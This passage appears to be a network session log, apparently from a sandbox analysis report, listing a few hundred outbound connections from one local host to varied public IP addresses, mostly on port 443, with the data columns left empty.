                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14403192.168.2.135409679.86.194.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14404192.168.2.134037252.165.236.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14405192.168.2.1334288194.98.135.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14406192.168.2.133351880.105.8.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14407192.168.2.1337856170.55.80.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14408192.168.2.134718671.163.51.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14409192.168.2.133772299.243.255.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14410192.168.2.1355246212.172.157.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14411192.168.2.1353664192.29.92.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14412192.168.2.1348308128.216.124.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14413192.168.2.1343764183.244.242.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14414192.168.2.1333958196.149.47.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14415192.168.2.1336606100.58.140.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14416192.168.2.1355208183.155.61.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14417192.168.2.1340336211.235.177.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14418192.168.2.1346212107.90.72.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14419192.168.2.1353918141.138.231.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14420192.168.2.1341268223.252.226.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14421192.168.2.1353668212.197.96.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14422192.168.2.134932262.174.92.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14423192.168.2.135660443.134.128.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14424192.168.2.1334184143.42.68.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14425192.168.2.1358404146.236.135.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14426192.168.2.133528048.104.174.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14427192.168.2.1339592213.206.152.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14428192.168.2.1346250106.212.124.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14429192.168.2.1359500140.248.16.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14430192.168.2.136069899.186.12.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14431192.168.2.1353642135.163.239.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14432192.168.2.1338220126.104.75.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14433192.168.2.1357930138.154.5.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14434192.168.2.1333240148.54.91.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14435192.168.2.135306866.117.133.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14436192.168.2.1349968188.239.224.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14437192.168.2.135597253.94.38.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14438192.168.2.1334024172.47.34.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14439192.168.2.1339714219.145.221.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14440192.168.2.134868444.155.94.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14441192.168.2.1354378206.39.104.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14442192.168.2.133841481.47.208.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14443192.168.2.134011271.139.205.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14444192.168.2.1350180146.192.226.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14445192.168.2.1355492188.107.254.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14446192.168.2.135203068.123.190.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14447192.168.2.1350316218.216.84.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14448192.168.2.1352954102.224.31.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14449192.168.2.135277632.218.58.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14450192.168.2.135004087.105.168.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14451192.168.2.13488002.177.237.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14452192.168.2.134271424.178.67.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14453192.168.2.135593087.12.2.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14454192.168.2.1360646191.163.103.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14455192.168.2.134390675.100.188.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14456192.168.2.1352426159.140.180.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14457192.168.2.1340976223.145.47.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14458192.168.2.1341870116.194.88.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14459192.168.2.1360062171.197.110.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14460192.168.2.1335314211.29.92.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14461192.168.2.1346400103.246.169.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14462192.168.2.1352914176.52.236.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14463192.168.2.1343490118.179.97.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14464192.168.2.133833247.60.86.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14465192.168.2.1357960167.156.119.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14466192.168.2.135548090.254.136.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14467192.168.2.1338240209.120.85.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14468192.168.2.134824488.26.204.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14469192.168.2.133541499.30.64.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14470192.168.2.1356140118.33.243.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14471192.168.2.135999889.158.131.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14472192.168.2.1346686153.56.171.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14473192.168.2.134057251.38.144.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14474192.168.2.1343482105.114.115.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14475192.168.2.1336220124.144.147.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14476192.168.2.1354906133.248.34.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14477192.168.2.135109246.41.111.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14478192.168.2.135910270.77.206.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14479192.168.2.1336520195.102.161.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14480192.168.2.133513223.138.129.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14481192.168.2.1336514196.233.166.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14482192.168.2.1342492220.30.201.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14483192.168.2.1348506152.30.164.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14484192.168.2.1341596123.138.100.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14485192.168.2.135336677.61.79.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14486192.168.2.1354590144.154.116.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14487192.168.2.1338186166.212.199.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14488192.168.2.1358396168.49.234.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14489192.168.2.135963640.216.121.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14490192.168.2.135846078.145.18.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14491192.168.2.1354812156.89.235.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14492192.168.2.1337792185.62.199.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14493192.168.2.135021461.15.76.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14494192.168.2.1359408196.163.165.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14495192.168.2.1360426100.138.158.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14496192.168.2.134308651.32.127.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14497192.168.2.1354172157.186.87.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14498192.168.2.1347664153.2.159.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14499192.168.2.133858046.212.129.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14500192.168.2.135049444.43.215.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14501192.168.2.1354800166.37.29.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14502192.168.2.134797058.219.132.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14503192.168.2.133303049.161.139.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14504192.168.2.1339172207.15.92.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14505192.168.2.133890676.223.174.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14506192.168.2.134975476.127.147.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14507192.168.2.1358084131.162.65.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14508192.168.2.1336258191.96.226.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14509192.168.2.1349674168.29.208.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14510192.168.2.1340562121.203.65.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14511192.168.2.133958877.206.15.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14512192.168.2.1355536147.25.241.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14513192.168.2.134135689.115.161.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14514192.168.2.1334870206.130.59.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14515192.168.2.133611050.42.39.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14516192.168.2.1355394175.48.15.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14517192.168.2.1339774161.159.130.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14518192.168.2.1358568108.167.215.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14519192.168.2.1333694142.96.118.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14520192.168.2.1339642198.230.254.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14521192.168.2.135574877.33.254.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14522192.168.2.1341708189.121.33.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14523192.168.2.133920653.131.112.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14524192.168.2.1359462213.179.106.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14525192.168.2.1338194122.72.96.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14526192.168.2.135662289.123.145.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14527192.168.2.134985273.6.39.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14528192.168.2.133879435.141.60.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14529192.168.2.1344872176.142.61.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14530192.168.2.133399062.198.78.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14531192.168.2.1348230223.20.125.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14532192.168.2.1333456103.224.221.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14533192.168.2.1334338178.96.52.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14534192.168.2.1353596112.202.44.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14535192.168.2.1349706170.84.71.678080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14536192.168.2.135731436.233.31.1118080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14537192.168.2.1357374104.22.10.2238080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14538192.168.2.1353102193.196.199.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14539192.168.2.1354502142.103.175.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14540192.168.2.135156079.82.75.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14541192.168.2.1358658126.179.148.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14542192.168.2.133792820.181.28.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14543192.168.2.135890688.78.119.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14544192.168.2.1356914220.156.211.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14545192.168.2.135341438.159.99.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14546192.168.2.134432660.210.4.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14547192.168.2.133638091.175.213.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14548192.168.2.1342866129.14.87.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14549192.168.2.1341792176.26.209.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14550192.168.2.134492278.55.213.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14551192.168.2.134439066.67.33.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14552192.168.2.1350190195.197.141.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14553192.168.2.1334786175.81.158.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14554192.168.2.134863269.127.136.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14555192.168.2.1335376209.61.65.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14556192.168.2.1356370194.13.245.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14557192.168.2.1335304202.25.84.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14558192.168.2.136024052.209.195.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14559192.168.2.1340200152.2.98.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14560192.168.2.1343114100.166.10.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14561192.168.2.135427217.100.90.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14562192.168.2.135108079.212.217.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14563192.168.2.1338530197.248.253.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14564192.168.2.1354460206.79.63.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14565192.168.2.134141624.130.173.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14566192.168.2.1342156114.2.45.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14567192.168.2.1344030119.27.228.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14568192.168.2.1348996193.97.100.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14569192.168.2.1350920216.195.76.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14570192.168.2.1337138117.166.27.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14571192.168.2.1343084153.233.229.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14572192.168.2.1349872102.57.179.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14573192.168.2.136091283.169.58.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14574192.168.2.1333482100.137.184.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14575192.168.2.135387876.244.136.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14576192.168.2.1341822160.171.15.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14577192.168.2.135232638.159.38.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14578192.168.2.133369450.84.151.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14579192.168.2.1351316204.116.59.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14580192.168.2.13485385.76.181.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14581192.168.2.1336862185.175.249.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14582192.168.2.1340570159.160.144.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14583192.168.2.135097049.126.19.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14584192.168.2.13376948.71.78.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14585192.168.2.134432688.159.197.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14586192.168.2.13467489.25.74.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14587192.168.2.1342292151.87.207.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14588192.168.2.134871266.130.46.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14589192.168.2.1343564142.192.55.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14590192.168.2.1344230168.244.223.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14591192.168.2.1343336106.88.19.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14592192.168.2.134854620.4.55.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14593192.168.2.1355470113.195.95.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14594192.168.2.134526847.33.151.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14595192.168.2.1345742113.166.14.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14596192.168.2.1334316120.212.247.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14597192.168.2.134984050.145.59.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14598192.168.2.1348420153.101.42.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14599192.168.2.135437092.116.194.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14600192.168.2.1345398217.203.106.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14601192.168.2.1353886144.195.214.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14602192.168.2.1332996182.181.148.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14603192.168.2.134427453.247.105.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14604192.168.2.1359914222.106.92.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14605192.168.2.135848813.138.177.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14606192.168.2.1354460170.15.255.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14607192.168.2.134070425.0.20.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14608192.168.2.1355866157.192.165.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14609192.168.2.1338724112.178.129.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14610192.168.2.1350364139.220.133.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14611192.168.2.1333876154.221.249.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14612192.168.2.1349050164.15.38.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14613192.168.2.133338632.0.220.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14614192.168.2.1340562146.31.26.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14615192.168.2.1344610107.56.36.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14616192.168.2.1348738140.193.158.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14617192.168.2.1336828196.202.191.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14618192.168.2.1336282125.247.51.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14619192.168.2.1360724129.23.220.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14620192.168.2.1333434194.2.247.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14621192.168.2.1339276153.236.136.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14622192.168.2.133825075.216.144.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14623192.168.2.1358608208.53.17.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                14624192.168.2.1350730131.28.175.84443
